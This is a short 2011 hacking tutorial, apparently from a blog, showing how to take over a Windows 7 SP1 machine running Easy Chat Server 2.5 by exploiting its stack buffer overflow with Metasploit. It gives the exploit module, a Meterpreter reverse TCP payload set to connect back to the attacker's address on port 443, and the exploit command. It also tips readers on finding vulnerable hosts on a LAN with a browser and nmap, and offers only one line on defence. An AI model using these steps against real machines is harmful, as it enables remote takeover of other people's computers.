Type : Tutorial
Level : Easy, Medium
Victim O.S : Windows 7 SP1
Victim Vulnerable Application : Easy Chat Server 2.5
Attacker O.S : Backtrack 5 R1
Another vulnerable application that can be exploited because of it's vulnerability. Today in this tutorial we will learn and try how to hacking Windows 7 SP1 via Easy Chat Server v2.5. This vulnerability until I'm wrote this tutorial was still in zeroday status or have no cure or an update from the official website.
According to metasploit about this exploit module :
This module exploits a stack buffer overflow in EFS Software Easy Chat Server. By sending a overly long authentication request, an attacker may be able to execute arbitrary code. NOTE: The offset to SEH is influenced by the installation path of the program. The path, which defaults to "C:\Program Files\Easy Chat Server", is concatentated with "\users\" and the string passed as the username HTTP paramter.
Without talking too much, let's taste and try how to exploit this application.
Victim IP Address : 192.168.8.94
Attacker IP Address : 192.168.8.91
2. Easy Chat Server 2.5 (download from mediafire.com)
1. Prepare your metasploit console by typing msfconsole command. Actually you also can use metasploit with GUI, but you will find a big difference if you often use between console and GUI, and you will realize that using console will be more faster and quick.
2. The next step you need to prepare and use the proper exploit module for this attack(see picture below).
use exploit/windows/http/efs_easychatserver_username set payload windows/meterpreter/reverse_tcp
Q : How to know that someone use this easy chat server?
A : You should find out, usually this application running in LAN and by typing their IP address on browser you will know they use this application or not. Use nmap also to help you more details.
Informations :set rhost 192.168.8.94 --> set the address of the victim ip set lhost 192.168.8.91 --> your local address / attacker ip address set lport 443 --> attacker port to receive / handle the payload
4. After everything set up correctly, let's perform the attack by typing exploit command.
1. Until today I write this tutorial(Sept 4, 2011), there's no countermeasure for this vulnerability, but you can use personal firewall to minimize the possibility of an attack.
Hope you enjoyed 🙂